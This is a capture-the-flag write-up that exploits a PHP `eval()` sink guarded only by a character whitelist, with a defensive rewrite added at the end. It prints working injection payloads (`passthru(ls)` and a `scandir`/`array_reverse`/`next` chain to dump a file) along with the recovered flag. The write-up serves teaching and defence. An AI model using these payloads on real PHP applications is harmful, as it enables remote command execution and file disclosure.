![75f7c8c017fa5f095d63a327977de5c8.png](227354082d7b4911b7f37b8ab7d5662e.png)

This is the snippet of the source that we're interested in:

```php
if(!isset($_GET["roll"])) {
    show_source(__FILE__);
} else {
    $wl = preg_match('/^[a-z\(\)\_\.]+$/i', $_GET["roll"]);
    if($wl === 0 || strlen($_GET["roll"]) > 50) {
        die("bumbadum badum");
    }
    eval("echo ".$_GET["roll"]."();");
}
```

The `roll` parameter ends up inside `eval()` after passing a character whitelist (letters, parentheses, underscores and dots, at most 50 characters), so we can call PHP functions as long as the call needs no quotes, digits or other characters. For example `?roll=passthru(ls)` gives us:

```
fl4g_here_but_can_you_get_it_hohoho.php
index.php
```

We can read the flag file by constructing a chain of PHP functions. Here's the working payload:

`?roll=show_source(next(array_reverse(scandir(__DIR__))))`

Let's break this down, starting with `scandir`. `scandir` returns an array of all files and directories in alphabetical order, including `.` and `..`. In the case of the challenge that means `[0]` is `.` and `[3]` is `index.php`. Calling `array_reverse` on the result of `scandir` reverses that order, so now `[0]` is `index.php`. Then, calling `next` on the reversed array moves its internal pointer forward by one, so it points at `[1]` instead of `[0]`, and `next` returns that element: the `fl4g..` file, which `show_source` prints.

```php
<?php
$flagsssssssss = "TetCTF{lixi_50k_<3_vina_*100*25926415724382#}";
?>
```

---

Tags: #ctf #php #web
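As an added defensive counterpart, not part of the original challenge or writeup: the same `roll` endpoint rewritten without `eval()`. The root cause is that a character whitelist on `eval()` input bounds the alphabet, not the behaviour, so the fix is an allowlist of actions instead of characters (the `$actions` table and its entries are chosen for this example).

```php
<?php
// Added example: "roll" selects a named action from a fixed dispatch table.
// There is no evaluation step, so a request string is never executed; it is
// only compared against the table keys. The table contents are made up here.
declare(strict_types=1);

$actions = [
    'time'    => static fn(): string => date('c'),
    'version' => static fn(): string => PHP_VERSION,
];

function handle_roll(array $actions, ?string $roll): string
{
    if ($roll === null) {
        return 'no action given';
    }
    // Exact-match lookup: a nested call such as
    // next(array_reverse(scandir(__DIR__))) is just an unknown key here and
    // is rejected, whatever characters it is built from.
    if (!array_key_exists($roll, $actions)) {
        return 'bumbadum badum';
    }
    return $actions[$roll]();
}

// Same request shape as the challenge; only the lookup differs.
echo handle_roll($actions, $_GET['roll'] ?? null), "\n";
```

The original regex filter would also have been bypassable by any PHP function name, since `[a-z_().]` is exactly the alphabet of a nested function call; the table above removes that surface rather than shrinking it.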